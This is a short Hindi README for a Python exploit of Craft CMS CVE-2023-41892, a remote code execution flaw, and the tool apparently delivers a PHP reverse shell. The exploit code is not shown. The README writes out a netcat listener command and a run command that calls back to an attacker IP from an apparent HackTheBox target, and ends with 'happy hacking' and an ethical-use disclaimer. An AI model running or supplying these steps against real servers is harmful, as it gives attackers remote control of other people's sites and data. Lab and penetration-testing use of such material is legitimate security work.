
पायथन एक्सप्लॉइट Craft CMS CVE-2023-41892 रिमोट कोड एक्ज़ीक्यूशन भेद्यता के लिए, जो अधिकृत पेनेट्रेशन टेस्टिंग हेतु PHP रिवर्स शेल प्रदान करता है।
यह python स्क्रिप्ट Craft CMS की Remote Code Execution भेद्यता (CVE-2023-41892) का शोषण करती है, जो एक लोकप्रिय सामग्री प्रबंधन प्रणाली है। यह भेद्यता 4.0.0-RC1 - 4.4.14 के बीच के संस्करणों को प्रभावित करती है, जिससे हमलावर PHP रिवर्स शेल की तरह दूरस्थ रूप से मनमाना कोड निष्पादित कर सकते हैं।
पहले किसी अन्य शेल में netcat लिसनर प्रारंभ करें:
nc -nlvp 1234
फिर अपना IP पता जाँचें और एक्सप्लॉइट चलाएँ:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
अपने बिल्कुल नए रिवर्स शेल के साथ हैप्पी हैकिंग!
यह कोड केवल नैतिक हैकिंग उद्देश्यों के लिए है और इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधि के लिए नहीं किया जाना चाहिए!
to016 को मूल कोड के लिए धन्यवाद, जो इस Gist में पाया जा सकता है।